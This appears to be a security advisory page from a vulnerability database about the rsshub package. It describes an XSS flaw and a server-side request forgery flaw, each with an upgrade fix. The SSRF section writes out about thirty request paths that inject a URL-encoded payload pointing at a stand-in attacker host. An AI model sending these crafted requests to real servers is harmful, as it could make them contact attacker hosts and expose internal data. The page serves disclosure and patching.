rsshub@1.0.0-master.7c9a499 vulnerabilities

Make RSS Great Again!

Direct Vulnerabilities

Known vulnerabilities in the rsshub package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • M
Cross-site Scripting (XSS)

rsshub is a Make RSS Great Again!

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) due to improper user-input sanitization via unvalidated URL parameters.

How to fix Cross-site Scripting (XSS)?

Upgrade rsshub to version 1.0.0-master.c910c4d or higher.

  • H
Server-side Request Forgery (SSRF)

rsshub is a Make RSS Great Again!

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) such that an attacker can send a request to the affected routes with a malicious URL. For example, if an attacker controls the ATTACKER.HOST domain, they can send a request to affected routes with the value set to ATTACKER.HOST%2F%23.

The %2F and %23 characters are URL-encoded versions of the forward-slash (/) and pound (#) characters, respectively. In this context, an attacker could use those characters to append the base URL (i.e. https://${input} to be modified to https://ATTACKER.HOST/ This will cause the server to send a request to the attacker-controlled domain, allowing the attacker to potentially gain access to sensitive information or perform further attacks on the server.

Note: The following routes are affected by this vulnerability:

  • /19lou/ATTACKER.HOST%2F%23/foo
  • /bandisoft/1/ATTACKER.HOST%2F%23
  • /bendibao/news/ATTACKER.HOST%2F%23
  • /bitbucket/commits/.* (special treatment, set the BITBUCKET_USERNAME environment value to ATTACKER.HOST%2F%23)
  • /blogs/hedwig/ATTACKER.HOST%2F%23
  • /
  • /caixin/blog/ATTACKER.HOST%2F%23
  • /cnjxol/ATTACKER.HOST%2F%23
  • /dut/ATTACKER.HOST%2F%23
  • /eagle/blog/ATTACKER.HOST%2F%23
  • /engadget/ATTACKER.HOST%2F%23
  • /fashionnetwork/headline/ATTACKER.HOST%2F%23/hello/foo/bar
  • /gamme/ATTACKER.HOST%2F%23
  • /gitlab/explore/foo/ATTACKER.HOST%2F%23
  • /gumroad/ATTACKER.HOST%2F%23/foo
  • /itch/devlog/ATTACKER.HOST%2F%23/1
  • /javdb/tags/foo=bar?domain=ATTACKER.HOST
  • /mastodon/account_id/ATTACKER.HOST/1/statuses
  • /mastodon/remote/ATTACKER.HOST
  • /mastodon/timeline/ATTACKER.HOST
  • /mirror/ATTACKER.HOST%2F%23id (special treatment, should end with id)
  • /people/ATTACKER.HOST%2F%23
  • /pornhub/ATTACKER.HOST%2F%23/category_url/foo
  • /pornhub/ATTACKER.HOST%2F%23/model/foo
  • /pornhub/ATTACKER.HOST%2F%23/pornstar/foo
  • /pornhub/ATTACKER.HOST%2F%23/users/foo
  • /scitation/ATTACKER.HOST%2F%23/foo
  • /solidot/ATTACKER.HOST%2F%23
  • /touhougarakuta/ATTACKER.HOST%2F%23/foo
  • /yahoo-news/ATTACKER.HOST%2F%23
  • /zhubai/ATTACKER.HOST%2F%23
  • /ziroom/room/ATTACKER.HOST%2F%23/hello/foo/bar

How to fix Server-side Request Forgery (SSRF)?

Upgrade rsshub to version 1.0.0-master.a66cbcf or higher.